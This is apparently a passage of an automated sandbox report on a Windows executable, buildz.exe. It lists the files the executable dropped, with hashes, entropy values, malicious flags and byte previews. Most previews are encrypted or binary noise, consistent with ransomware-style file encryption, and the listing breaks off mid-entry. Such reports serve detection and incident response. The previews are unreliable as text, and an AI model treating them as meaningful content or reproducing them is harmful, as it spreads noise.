                        Preview:TWGTYPQ...?#........x3..W..1...w*F.....diV....Xm..*.._y.....w.'...|.W......E_f.Q..2y9.9,..d..V6...L=9@2..?g\1..-IqdH&D6...O.F..!.6.*.9W.D.n.....Q.n`..Q.*.bl.5.@U..JO....q....1J.&...&.E.2..O.]d....5.F......-..cB....@..aV....W.n.Z!I>..-..m..}.o...u_2..B....7.e...s.h.o.(V.]_.]$g...^....x....8:.._..m..,$~z...*b/.o.xr..d...c|.1Y.....&j.S+Q....3.KC_3..o.....4.|..5r.D....(.L...'...6......t...}..y..8c...j...V....14@.......;....=..@..#B...f.yu.z]2P.>2?;..<...ht.......r...r.~.....:..>.......wB......Z..w,..Y..Bx..........I..y..VJbD...L.F..8.EE.H.5............qBD...a.Y8.w6..#.z.L..!.r)M:...B. .>W.,m.V~..+....T."^....Y../...M....G.@N$@.Q.q.wJ...,.......=K..J....F..........n*.R.N.,..@5...-.2Jr=..%.Fs'X..+..tV-..A...Aq4.c.S.^}&".<D..w\.+..-.-c..G.. &)...F.....%j....1.C.....{|X.7...>...Lfe.l.Q.C6O3q..|.7.t..).&..2...<..<e..C{.."....+.=.0..L.A....$.........J$..]...oP!..._..>%.n.9..,.M..%w..#..f0.J....|a.m.J......|....L....d...8....._..z..V...x$.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.8597304442429445
                        Encrypted:false
                        SSDEEP:24:nm/JcxMZiEHyGdO7mozU7KUQm9lPBSdUKMxAARHhmieWBRSjQbtOnh8nO+GbD:nYSmiE1ICIU7KJmtmArTvaQbEh8O+UD
                        MD5:622A3C2F7324B35BB60942E3607A641E
                        SHA1:734469B9BBE56BC1304E295215251F27BD7B9224
                        SHA-256:7F73DCD2E16EBF7880350AA912DA040A7C235E726EBBE6A8C2D434F2013629EB
                        SHA-512:4FE39CB3FBA5510886C10E9C9A67C9E3988B4CDBF9682A388A455F6E2246363EC7C09C2FE1EF863DD4E3B97CE9480980DD3840E5FCA8E80E76A29E2A4D8EAE93
                        Malicious:false
                        Preview:TWGTY../.........tr...'.c...^....$.g.WP.,...E7O...-..@Y5<.YX.4.@..8.....F.T..|.w.......A.-i....QE...0N]..V.68..........V..B+.T...?.v.|%.qH.;..V|.7{5/...J....qw.@b.u........h.....8.....b.......]....D...^....X.CQ.pt.C._..A.'.QX?.B5-....D.Y.'(..8>...{..I.(.JG<...z.......:[X...H^.W.3...1...k..c...y.H`.9.,.8......$......5.(.Vc...y...![....2.g..%j...Z.!;o......Ow..,..d.g.....c..`.;...>.3..u.....;S..c.....,6.|..W..I.^=..t..1,M.VJ....9.....3.....B. .m}M.....B5.z..1.M.}.2)...$.Tn.....".2.(..6...../..y..,...+.`..$...e.I;:..7........B\/U<... 6.r.%n.....8......{k.jQ.*...$...a.R.;n.+^;^B.Pp.g'%f....0N.`.)*........p.6*s!`riM..y..; oT..&...Z.t..G!Y......9b.J..e.1..9.V...HI]..t-....;.W&.]..U}.....tY.~0{.c...N....R.G..[.....z........Q.{.'..Yp3x..N..4..t."...Qz...).......G.....<.b.W....^.....w.$...k.b..+Y...]..A.;...5R...a.oQ].@..k.......o&z..A.H?,...9...^..........V.n.S;.6VR".7.......T^3..n..j..zY......1>.<5...pF..Qj~...X...`,.>m
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.856573184236071
                        Encrypted:false
                        SSDEEP:24:tCtEeS2UEVD0+mODodZhBhffgezwMlf/Dj/bN9XmkxThuGuxaGfGbD:8OH2UWD0Food7geka/D3rXdlucCUD
                        MD5:30DBF7BB1D06576D4661E88E26C526D4
                        SHA1:F5F0B6EAB9CFD6F1C249852F45FFFEC87E62CD8E
                        SHA-256:C92A90AC8C6A903465A6C79CD8ACDDCA2C817DE372AA023B2ED521E0FB9B48EB
                        SHA-512:CFF29B4C9369826D2610EF9B2B6A1EB5D2554E165EC03EFA6050684E8FF903496161EF1C5B862F1805A33DA3AAA2547B131AC1595AF11EDFB5E67D1B664DCAC7
                        Malicious:false
                        Preview:TZKYX.(......5.....&:o.......f.......k..O.Y.......0[v.`../....!.o9...].....!r.f..t.$G.:#.......@.!...6.....6L.I.........[&.._j0.*....~T,.&...........gX.....k.43)N.....Q.W.....i..^U`.v.mS..PD<9....`P.......>\...E<.Z..>o.....s5iB..8. ..c....~..O.bf.\.}V........B..d.a..U....*.Wp.N.../Tf8#....!...T......>`.i...T.0..Gt..I....}n...=.X.3SK.d..v.. c.a.#.....r...._P.'...?,'.E.......>.).....F.H.2N.@..q.Q..v...I...5L.@X...]...f..9..;A..*,....){.....A'.`a...|..}..s.!i..F......L.x..=2.'..s.......$0...C.U...@..2`.[f.f...hK.#$.JC..D.j...~......7.!I..;+.}f3i.p%gJ*..M..F.5h-.YM0VZ.j5/&U........X.'fJ....;.;l......4.......~....?v.>..C..B..............\.....n,C..C..n.....5.....:...fk..]I....7>E.Z....L.\...o...T4tz......k.Y:.^....kY4Z.....w|..)~ .....\j...&....p.kD.g...pF./~......^.x.f..e....%...=...........o."*u.P.s...i.w.J.*(^....X%z0?.Kf\..Y<R.X{6.....Ur~N. .....~h.!..I..uK']f<.T.....y, ....EJ.....I.....(v..ZJN.F+.~.%..&I...9I..x.ty=..BP..\...3h.JT.bP.j
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.834028828755596
                        Encrypted:false
                        SSDEEP:24:AFXbt9DAB+1Hqo8vcN/2YMuKU+EmrxmBgwr9bYjRoSl6/MhhEHIrkaoTdZFEu/Gg:Att9cY1Ks/1Mu9cxazCjRoSl1hyhao/p
                        MD5:65557480E50A19EB5522ACF04C7D61FE
                        SHA1:8BB366E8227AEB9E56A644BD83BBE10F2EABC54B
                        SHA-256:E410F0029ED1267349A2689E5C295B8E0B7B3597664658C13029E619B4D918C4
                        SHA-512:B96CC586398BAC9BA7B29D9034D43629FEF9D6C7F0F906B003F895517936099FEA262C477E1FDBE5541AE02386958BB611B3B5DD787CF867EB40526B3E3ED7EB
                        Malicious:false
                        Preview:UFTNOl'....W.$.A..........G..3..3...i...R4.3.1..F...<.a.....@....|nr.....P....L.n....R.2...u..........1.O.....|.kC../Q\x|...^....m7,i.C."...H..!.. .;6OZEw.`..t....}..8..q.L/O.u....'..p..8.m.4...M$...>...H..2..x.d.6;....%...&%..v.....a...+....2jp=...lb...Uw....p.fi.c..j.....;.:f...+.R6..#N_..4........1.."f....\/...XN....R.....V..zq.~n.of.......^..rL...D..&.(./#,.6..t....X..x.7+..N2'-..U...'.l9..9..r..0A...].....F.@..C....&`{Y..hh.y..S...`..U!.)..`u.T.h.....w[.. .?1.!6.O{...G@.+...(......4.......a............ztQ.p79..P.s...F?....w.:O.k`.P..d.b.f.../{...."=.N(?..`u#...R.A......j....~U..J.........Q/.*>..K.#.1..[v..pF..7..ZrE..y. .b..u@.~.5.S.c.R.^.TS.!.....E...S(U.a...8%Wr.B.:..hF....)M.[;.4.?.;.D.{.LE.6?.).MB.r.....C........N..).kT...-..7...x.......1.'F........U.. s..&......!&.f.D...b..d...NCW....f.y3.I..K...Te..D..#%...7.X.3q..\]1..W...D...c..\n.;)..dZ.0S...N...).}U.2..Z........\]...i.q..3.`..n..s.l...p`..a.2MWI....@.[q........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.845056545497165
                        Encrypted:false
                        SSDEEP:24:BKoH7wQEwv+fQGhPjig3c76NP+KGBcvmE7rBD6nATELz/3RNGbD:d7wQEwGMuc7wGKkGhdTMXUD
                        MD5:C54C76B21179B2AF102F85406FF2FCFF
                        SHA1:616C44CE6D100D82747A42FD732065CC00E72FAD
                        SHA-256:5995221C02DA202778B328494C7A6D1F0896B18FD8B6E621B89C2ADFA4093BEC
                        SHA-512:6C9D0D1058E7879578824B7EA20BE80A0063AA452D55FF43D92D2DC10786C26F6B1EC118EA8EF6B22A147693833663E1D5A6216D9D29DB5A1F68A1556E79A3AB
                        Malicious:false
                        Preview:WSHEJo.%G..V_Jam....8.{...9]...`:IX...6q.r.~.p.@..|}L.7K..(..;G."..t,..=..vA.aJ..T^l.C./..x........j'6F.<...W..........$E.E...j..8-...&....#..V.[..~.OP.....u./.q?.(.K..(.sfj]'V..y..a..y.!...9.:.S..r..%..0..F?...v.%.z4.8e....l......[...0N.8..w.j.p....UT.-..>....|....6.F......1uq..(.o..%.......(J'..`.....mhl.3....&.4.|...rv.C|.(^(......e=vj.z.<.Gd...z.W.y.E.{l.W.t.C9..H#...-...A...Q."d...I.\.....].;_.4J.\.v....D..Sj..Gy..E..U..D......l).[;...k..9...,.0.u}.6...a..{d7"..pD.u.."F.z.....Sl.3.)7T....>.....5M.U.D.....\eO....l.....'*..E)..Y.. ...=Y.22.Z.V......h4......\.!*.{Ov..N..w..'n.~....Q.sE:)...:....]bx.\...k..m..G..Z..q..T.K...l..+D..\.7...G.6Q.v.!.gX.u...1.-qM..c.. 0..D..X...]]....._^.tfy~)|B......nw...B..a.0z".YJ...I....}D..9.....g....U..!.C&G..}e..s..,}&....b.9.t...S.8....|.UK...cz..UH...y.W.............,9z}4H..;....j......#yG.t...B..*....T..;...@..U.c...U..a5...1W.e......t.W...2.!....{..D4....N....h4.....O5....MP..|5......f*T1gq...f4
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.848155544047657
                        Encrypted:false
                        SSDEEP:24:jfDALM075sk7ou6ZNYMMic7KrKDPF1J+K3LlE/q6ldFqxQPolqgHGbD:wLPVZ7ouANJMI+Dd18YlQln5PolRHUD
                        MD5:85172EDD12EA0C1941917D50C636BB5E
                        SHA1:4267D4018D82DBCBB3E15B6576AA36C373EB276A
                        SHA-256:516B73AA43741D21A2095B4EC5A42FD19350AF79E15F61164E3C02BF03BBFFD5
                        SHA-512:56FC6F4070C28CFBDAE65C1DFECC96FEC9B52682500DBE3154DF851374815DB5AA960904CEF6ED8976FA638812C109A764A18CC2F81BF6113862522A1C06A21D
                        Malicious:false
                        Preview:WSHEJ1.H.......;....R/W.f.V.........a..!N.!..$.x...8...aG....+.D..,.`.b.M@.a...&.G.^W[..Gt...(.x...a9f69.JlP.[s....z&....E.|..\..N"..h..Q.....2..+.M.>p...(....Z.:...R.Q.....j(Q...E.2.q..%..z.J....p...*t.{.{.(.....%..".N.f.W.8.-.._N\y.Rj.9.....m..s...#'s.......>..v.c$Y...H.>u....../.@.v0.).4......a...`..A.z.j..U.s......x.....#....Q...........p).[...O.......th|?...z.......JL....."..ks).FmOi$.q.N..%.Hp.u&..}.......V.[..Y[....,tRz.Q.yOKgs.y.e3Wsq'Af..*.({..5_n.X.*{.8t..u.?.u.er.........6#..8..[..+....]z.0d..$....~lA...M.4%A.....X.Xr..'4D==:......n%z.,........*...t.G.......W.=...?.y.7.....z.:...2...0W53..W..%N......Hm.|c.u....=| +..x=.o............=..b..N......j...PI|..b...r9(..............f.@...P+.GL.9.....@Z{3....,..61..+.U.Kui).e..../.....E.`....iI1....iY.(...+...=(%.J..H.5.T.&...F+...Q60..r5........._p......!....:0$.&..@gK.......?..|..&.P&haF.;XD;.*.n#.U.&h.....N..{.*..m^...:Q,".E..........|.;{.%Os..rR+.^......|;+...7..W~.3C...=...._,]5M
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.830338993184211
                        Encrypted:false
                        SSDEEP:24:+l5w6HeVMlsht2a0dK6pKOWR14v29rXu6cvkvkTVT+az9NOP7lVuQL7yPt681OGX:+l5wX2AtEK687O21hvksazezvue7w1OA
                        MD5:8C697D8DD8C17CE5A431463A9C95B2A8
                        SHA1:C0A98254428EEF584BDD963945B49820CAE602D7
                        SHA-256:6BF1A715E3A8B0AA2452250F85BB0C8663CBCAA582C31E0140A4529C5D65362B
                        SHA-512:9A9F299E1F47D7ECEF203D68B2241DDB3C7176BA98C7B18682518545C309DDBB8B909B72054E97C20F08D76001E543F406E8AD0DC8331B05711115466286FDD0
                        Malicious:false
                        Preview:XIDWCn...Q....~...s....:v%.`.G..../..".....Z. .Q^..G.|.........B!]P!....@E...u.`.)u......(......;.7..}..5q.......5...a.......[Jgj...e-.V,.j.~........dI&...Fkh.1_f.@l.k./...n._8...)....~,...`.Ad...C....=...*w"Fi..|*.s........YBu...........M.8.T.#,.z..l..P...........M:....................w.e.(..HD..4.h...]Jr....|E.x@.....#..D...E._....\C.......<.r....<tv...+.z.%.Y.C..qx..Y.xn.z.x/O...U-.l4.....+P..-.<c..,.0R....{G..T.."..q_.{.rF.e....1M..!......c.B..Q.r..0...E..W..........H<...f..)Qo...;[....\..<..F..s.TZ#..J.4.Gv.......e>}\...LSf.P&..b!...].8Na..O........L..J+>.G....S...:......[.)0...\.!..7f.xh.cQ.D8.:..Oq.dz...........{q.6}.N....c..p.V0...dj1ka.f..q.D.O<.J.09...G..,c.B.z.q%....0....T.\?Hd..50.....W...aj.!...P.4E.[#....U....v.>....,.u...8.%...E..Q_...h.E......D....Sa..HK oz.WyF...p.....;8...u.<..(...O.+.T...&....A..T.b.?...3.)&d....R.}l.G@.;L|b>Q...BY6d..(:N\.w.kX........`.t.V..i..).;..s.MU..fl.]v3.R1...."p-.....7..K..;.+....ecN..nF...1
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.83569657426654
                        Encrypted:false
                        SSDEEP:24:8D+SrI5yhhhEOUgJF2FSyEsNckhc5ILAKQh/t6ljW6icYvWbFl4vqyTvHGbD:8D+yw4XEBgJFsvNckDLOR6izCmCyTvHA
                        MD5:50067E4BF527508F6CA752BA499521AB
                        SHA1:2883D316F3A270841B358C94B9041D05B3B9ACB9
                        SHA-256:1BD2AA4F32E40BD36FA809F4C93DCCE811049E67AB1844642C517DA8CDE2A20F
                        SHA-512:AA896FBBED7FF6D83542B4A178C127DABF3A5032D1FB4BB6C3B5AA016668492B3C462E8EE0BE2A76F4D729F76FA0765FD68A2CBE186DD3F5310B00E750FAAEF5
                        Malicious:false
                        Preview:ZGGKN..|8........L...|(W....S....0.....NZ[../e.V.SPB..I........J.'(..=...Z&...i.].....6.3Hahc.....a..r...j.a.....gRCq..?r...s.c3C.ffn....CZ\..v..9.Lsh.EDN.7.>9]..".6y..=-...B..9.-tCa/.H.3..Z...aNQ..c....cLc..0.@&....l..8.]nX.]....l..\.....x1o.....a..Q/.^4..Z...hB..riG..{...........$...l..p.EU.c....u9]3L...%...!...Y...z ....=FXb+j}].)0..,cx..c..._..&...W\&%.gc..Q.cD.....`*...v.....TD.....wG@.^.-v`i'.....e.9.....Z.@[....&)k..+J&........x7.}.......}...S.i.Z..pp..L..kp.P1.J..!..kg.m..#a.....']....e.F.s..&Aq.N..=.6.5.j. m.._l'..,.ZM......lS.....'......Y..u.'...x.,.../.{....j...).Y?K.-.K...`r...3..$.2..ol%.Iy..,.;.d?)c{....:.......Q..+G3..}.".K.s(..!..p.b..DjZ.c..j._...Q...-....}.....vlsx.*.<.......^....!..tD..1.;.^.a..C...".g.F.....6.b..@..6&..0u.H....I.o..o...*@q..T..xz.....T7<5<.j...c.C[.9....2.u.. [vI.H=.9G.'.JY0...(8..3X..b..FNC........+.]..$.eM7..a.. D.].:A,T..G.'(....u=..U,..7F...6.E....[.T.........^e.T.+.Y}.7N....4.....~...Y.-...x,yE..PX..w
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.8249379824326875
                        Encrypted:false
                        SSDEEP:24:7gqbVVvcNBwKbX6ZTCeBqk9o94SYjEyBD3WQii25JOf8/igX1SJWhV3ux1watfGX:7gskyKz6ZTCeBjnzx34XOk/9X4JWz3uy
                        MD5:7647F206D02C998870162E6B483BF807
                        SHA1:837160B1FC26BAE6E8083BA67251D70601804B89
                        SHA-256:3671C2EEE71AFF0550D8FA94F6FCA8C766AC5F278083464A2B053BF70015C97F
                        SHA-512:DDB0691C65EAA2C6A7ADC304D486A830E28F812F66020A6643AEB8B9B5388B646D3478DBB77AFB6C73F4C735C516DB0E8F28D1BEA2CFB3778F4C853FFD4F8246
                        Malicious:false
                        Preview:ZGGKN&...Q..R.x.....wZU...4/.....Gj;.$.JW9V.Q....y..z.62.!..X...|1.[..!.x.XZ.4n....vW.z.A.......e..XF.e...c.S.?.............IqI..g$G.....\|?`.-),.(...a:Y.S..^?*....<(..H.i..1....Q5..T..Gc(.@..x....C..../y..6..b..c...[........ .....>B.M.....v..YW..yY..Z2.O...z...;.=.5.#.H.A.x.9R.a..2Gq.....(..(.....b.[D..:P.$..$..C..p..>#<.-,.vo.J.BaH~..^..Q.Z..H.6.X.?..Z.e{.td..x..;..P...tFo._......A....[..-.).H\8.k.....r/.+s.vvC.an;R.2.BEsTfU...?0.+;.3n-8...yD.nZ.X.*:.....&v......z$.9...J...Y....\..C$..H..F'Z..Y{."K..\......'._.......K@..7"....T.\^D..=.O...cER...f...s.V...Y.n..B%..XAa.mw...V:Sj.xzk..G-./C...M.xO......?ozO..rG.ujX...n..of<......d.....Tn.Q.8.....`]..OK....y.qh..hZEu.4..G...f.;p.v.g"@...G..VE.3.P.O....<^...J.B..}...>c..8.Q.......sq..Q..Z....81m.x...A.......5.w..+..wBm.....%.........v6L.|.4...m.../.b..pC...........6U../^. ..1R.......O ....i;3s....<.....{Q>t..pH..%%*1wO.v.;....<...um..1K.y.)..S.c....8..!Y..'..6...`.SB1..>.O....-...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:PostScript document text
                        Category:dropped
                        Size (bytes):1567
                        Entropy (8bit):7.873317984995965
                        Encrypted:false
                        SSDEEP:24:BgAO1YyYwAP3mwA5eHt31c+DcpWVpDCK9s605u9BoryyxeP/NRQ3dMGbD:a/YyYwrwAmPC2DC4sokryyxePL0dMUD
                        MD5:C282232B8F49BF2364C4E15CC68B5773
                        SHA1:49FA151E0F8EB6E1CBEADC25332617FE96781714
                        SHA-256:67FC21E508B1F2508AE02D23CF71864FBABECE9BC5E9CA55D691EB0D0DADAB55
                        SHA-512:73B7382E913ABBCF214C82584DE24D620F812DAB787EF6F72B26762D51BF5454387686FFFFE45B9C3E0E3D49835D78FA0150DCE852F18D07A5F2777FFA34AAAF
                        Malicious:false
                        Preview:%!Ado...ABM/.S.<dQ....WX...}.a.....x;.u..fW..`h...K$k8....~...0.].4.jp.'J>.B.....IK9Y...C8e.s... ."%.y.v.....7i.F..On.......K.....I..u.Z......Mt)..-.`j....\F.7$'`.....]..Ete..)..G..*..(..a..K1......]....(g.5.+.o...Y...<......I.7...>l~....qE..>.w.@.e .../M......e4c.Q....?.^V.o..`..;.GAg5.<..CA<.....@.k}.hb.~.B.?+Q.....`.."1....l..C...P.>5M...LN.!_)S.s..s...i...y.g.5.Vm.A.;&...I.8..p.l@.....J.y,..0...v<b.gF.E..M.......;.K.8.r.)..$6.....>...>0T^6.tnD6..6B...`xr.*...b2.Z,...z.'.!....0...O..S..y....cY....1.!...9...B.Y...-,....c}.....u..J..F./Y..q..(.$.....P.'_>W...A.,.._.o;$.e......n..w....L..90.%t...yv..T..].|Q..%.::.cP..1.'.<dN......B?....25.F./U..+X.}.x@N..#......r...*......W..5...OV.A.J...s.IE. ..4......F*v9v......i....9S.G.._.0...*'.....!..';/..G.!)./.T.P....B^.yIA...X.c2r..8.F..Y.).?....R1.....&.#.|..^f..*.<H].8]...D....V...1..]...........y.m<..-..@.aG.......>.G...xF....w.2x.y;.H,K.il.......e........Z...........2..6...V.n
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:PostScript document text
                        Category:dropped
                        Size (bytes):185433
                        Entropy (8bit):7.876215877463176
                        Encrypted:false
                        SSDEEP:3072:pc1mvdKNXeW+sP38AHt343dX/J08s7vlklTMDRHggIfUvpatgUb6j9XE07ZmandF:vKci3PHtI3vRsv6RMDRFN+49XE07ZmaL
                        MD5:4642D002177F7C12215DA2CD0B46FCAF
                        SHA1:709F38D1416CA16B16C40839EE77B8425F99B746
                        SHA-256:7C4E4B70F29DA0D99C9D0342804E8974FAAE435959A1A499916DC1278A59147C
                        SHA-512:4FBB83E03F7A8FFA36FA1F2593675DBD1201A76600192F155BE36BF5E1FAA0ECBB37EECFC22F94D24706A4DF54933E96DB92B00280012F715A88FA9689068B93
                        Malicious:false
                        Preview:%!Ado.UC.Z.,..).s......n.....}...30..V......4-.WlsQ.c.....1,@.=/.,^..W...JT.|..Pz.].H.y...f.'........7.t....A..=..H.*.E....."..]J..j1..T.....:@.x:......A9.>h...N.`.jd1.k%.>......!G.....-.......v.k.qp........p..WI.d...m.p.B....M..j}._.Q..G.......\.D.w{.>QS.......j...|.f..x.\..<V../.).....N..Wv..c..&4.l..S.;.E;p.L.r.V.........b.......]../C`.....c&C..z...\r..L.w/... ...x...E.z.........T..h&E...+.G.....MVa...f.&}{..4...b...\...~...9.f..B.(ch=s...1.'`..:.1"-....h...+p;..g...V.i..4....PY.Md.......f.k....bd....0):?=JO..b.@S.o;.E.?....6.Vi...t............L.*....g.....K.C..[....G..*@W...U/...5C^a....A*.k.O`.V.=."pH.....t.t..:.7.6k.....j.KU...h.._asT..D.M..45e..x..@......w..Q.-F...X...qeL.X+...0..?.....lp..(......5_.F...U......X.uEV..\1%!...u...}.p..f..........S....V.4$G...L.kc.../k..n.x...q....`{.........Wx.....:._.wI...[<.L..~..A..@......X....Ik..:S..{.%...!..6....g.:.n7.z.....;..<.lsd.*..Aj`.$M..h..o.:z|.\....N...*...n....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):227336
                        Entropy (8bit):6.986727551755582
                        Encrypted:false
                        SSDEEP:3072:XI0a4cJVvUZtyvOaDYyos4C6sRISJJm6nl4Ca6CWOBeQjU7N8BmPO93OoWiRnnA:ba4cweX9oBTeI561auPJ7+mO1nA
                        MD5:9C1E2C13417078C39C1F3F80CB764CBD
                        SHA1:10F48D153CED7B843E55966CEBE1C190605C1F09
                        SHA-256:38602A1CADF18EDA76A38FF4559E989D0532E166E876926821CB81DB750B2D81
                        SHA-512:EEEA53030923F5B477861C4548656862982FE489AA2DCD5CF66240ADCF52CB5E8DA39F46363CFF8EA9A52F3C88F8861E106AE7C7F645FD9918E9B35C8BF28E4B
                        Malicious:false
                        Preview:Adobe{!..\..QPY.S.h-..j.Pp!$...H.E.8.8P.....f.IW.,.t.l.O.....L..U$ak.........PjO&.....e.SP*.R.EIa@7..dr...J!Epf@.a..k...v..F.IT.cLSt.M..%l..../.1]......%..}.w.N.....9...q.fG'G.Ik..TD.........d....a.e!.uDO~.U..Q.j./#"U....].I..tF.K#.0.#.....Y#G.c\@.U........)].........k_L...Z..]'=6H.h..@.......&J.,..Q.....E.^.. _..+p..l..t.....N.G..*..R........y.=g?&z.n. V.%....:.d..+x./f..C;..5.@...%..~..s..6#f.......=C..}.j~.!p....f.`W..<.............|%U.0..}.U.T>....y..S.qp.+.T..E...F5.M...L..3..B.h.jV...%.........wJ.+...5.+.......?B.|...>j)..O.)..;.."H....5.........._.tk.....+*.V.....4rTW.!.{>Z....&.....;..&..^#.k,.&&....$y.ZJ...drC...Ec.0|V...C.Gy.._.7+..U..8.JK.1.v.?.Q.q.;....\._pX*..G:.).FU.....X..n..j...=..tf.=..l.[#tG...P._% ..!SB"..>.@..=aM..pa_...I..&....?.q......b...P.....&H.gH...>q.$#6^.O9../q....0."z.X.+....L.,.=..Y.;W..ay..T.@.B....hb.../.*...M.LlW8.?t$.I.JT.~ @W......_.e...GmbhA.9K....D|...:..q......34...d.2}...mc...x..m....~.h
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):67060
                        Entropy (8bit):7.997517889853005
                        Encrypted:true
                        SSDEEP:1536:psTTADM3RXkMw33dnTjxnKTWroY0v28gUZj1z+WP2vGdA:qPAA3J2BxnuU83ZzRdA
                        MD5:CADB68A50D1D08EDFC57982DB72BDE4E
                        SHA1:E3C8D57B7B5BE94FD0070BDF85855986C1752CC3
                        SHA-256:BB3BBF271EA8427B19034119D2414EC7647DFA75A73A534137FD5E3A766E805C
                        SHA-512:C9613A0E6DA76EEAD5E81D96AA0626A5A65B76C0D9F40622C50DC9EDBE359075C278D9C50BBD8AFD377A31C5057F53F8438910EC9B99B9CBFE73913274922834
                        Malicious:true
                        Preview:4.397e..^.....35.[...-[...X]..(.@......K...B.x..2.G>.!....K...q..;.pI.f.*..N.2..i..iu5....h......s0.......:8....w.......=..5.g%.;v{c...#..w.XG......yA,if3.n...3.........../..TB.K...4(G....ET..3Am....7Ma(..8..Y.S..\_.r0..e..........U..7...Y.....GIm;p.rig.|..6..$.}..:.[.u..s...N....:.3y..n`w.-....8Wn..,.Hq........N?.....d..5#...i6H....Wj.X......#/|2...tf&.F=.qWz3.H.Pn=Y...I.w....o..jDWt..j..g....j.7....).6lL&..S7..!K....Y.~..........Z...k..}P...$+zzF.J....~....9..G.bW.y.H.p..G..;...z[....S..k.....m.&..X..@Q...._Z..>...].<7.0..=..?.7P..O.l..4%!&-z.....O...)c..|....8eh...|w..T..I.oS.[sjtM.r...?.....7E *.....+.....vl.I>.1.+....)O>...lC.Gc...S........J;.T..4...H..:.........>e..o.>..<.9.a.C.,4.Wz.i]..*....!( ....N.].:..a.x%b.v...e.f ..b. ."..[...8Sd...........ok..t...<.>.....b.o`Yd\P.....wP..\.G..N..T+.O.+G.B..Ec..........ux.t.....J....c$..!......vRe=........x.+.6..Q....mo..[.pSE..E..{.^.+N..E.......J.. Xy^Bo..m*.Z....}/;#`..V.....a1ns.l..Z..D.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49486
                        Entropy (8bit):7.996443173510002
                        Encrypted:true
                        SSDEEP:768:x4qseLMJcdSdwo/qwfsto4FdAQaTlNpAhoV2p6ctqXTv+xkwweinHpQA:x0uSKVj+cuAhY66ctiTjjvQA
                        MD5:BF48E967805C6CE6E60C3A0E6A9E5031
                        SHA1:19C4C4D673848DBB8EE6F0B45EA7FE175FA4F8DF
                        SHA-256:929541FD692952DBEABD0EA8B491918170C2F5762501A457249635366E392D53
                        SHA-512:BC5EC71F6182B003912F5CF2811B32E3B3AB4A754B03C56851D2C4E404FF5B986A84C00E6F9473A9BF2C519FA1B938DF7FC079F289BE3E21530884B78B935413
                        Malicious:true
                        Preview:SQLit.R...n..D:......:..A....vC#.w....N.y.A....M.L.ibF..zt0.s..{..Ua..=.h.#!........%.7...W.j.s).:O....6%.@^w0Y.....t.....CL>1.....%Ir...\.t .y)....T......7...f.V.#.. .%..{...G...........oK.!...6..S..~G..W..x..C.r<.Y.C.'G...^r'q..B...H...U2}...?.<g.H...J.N....Oj ^=~.M.=.0?r.jj.. .?.......4.;!.5i....*.T..W.c.v......[.<.wd......A.N..8.....*.....f.ko.m...o.1..d..(..3...~.j.....W......t..R'.':FMr}N..@....{.C......dAr9...e..J&..~se..1.'..~....(.@.5.H.x5.....z....].|..4.....pvQJ........^@.....-.g..B..-.c.^.t..p....yf..m.....v.....s.o...[..k.:..\.v...:e.'...k...}..G9.S...U..[.y +..._......y.}.w..]h..\..........o%.*C...y.Oe,Hi...ta........9.#y..}....Y.x..#).Q..2.bWL..>q......9$..>.#.z..L....u..Ck..ZFW\L..76 ..w.a..U.)....-.V..Bw......p.A..wi...$.y..!c\~....E..o....!?...........(...#..?..O.~...X.Q[0.d.x\VX......zN.B..0.E..ac...c.........$.Yd...L......;S..7....6........87..g..;......._...0Z..W.T...2..[.......(.......by.....?]........~H#q.B
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):354
                        Entropy (8bit):7.283703856880574
                        Encrypted:false
                        SSDEEP:6:Qrn2lUDGqEnxq+oSS2k+Z6zjFwBhTcCxt6zUwqxWYhP3IMr8FGcii96Z:QLDGqE5TS2RZ6zZQzx0aWYFI26Gcii9a
                        MD5:EFAF2B1644ECBB0305D831484644C5C4
                        SHA1:A66E751C43075A92290456B8756285A010576EF3
                        SHA-256:78EE74ADF170B20B96F580F650AE1D877792214BB1E9C3A34AB917420AB35BEA
                        SHA-512:96E02384A2560580042346DF9ABA88B14CBE66574C0659643BC73BAC98368E9578DEDBE321BDDE582A5AC6EE1770F0549B96464D4C41858420A1D2288428AFBD
                        Malicious:false
                        Preview:1,"fuP.2....U..."`.|.....Z&*(...X..N.1.jU....T<a.................2..NI.. KL...M...Be.i.*.$.e..~....y.sM3.w...SK$.:....t?...u..A(o>,..y..wIp....27i...7...ug(I.g..AG9..__.j.zs..;..........<.......T...[0J.UF.#...`..qy...7>,...*..b.PYS.-.&+.}+.O!.&.h...6..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1554
                        Entropy (8bit):7.864799454666829
                        Encrypted:false
                        SSDEEP:24:4uIji4OCJt71MFixq4Q1g9OzBhxakZZYkb/0HlWcDHIysIsJv1CKcTc39JGbD:H2TOCU+uSMho8b/0AfF1Dc09JUD
                        MD5:DD580E3B745C10CA7A07C7797DB6A9E7
                        SHA1:A5ADBF0FB660CDFED6E0B8BA81103C2E7D0588BE
                        SHA-256:3ED93A01F78299B538FC176984A7ADFFDEBAFAA9E286689CAA0A7E4A0075C914
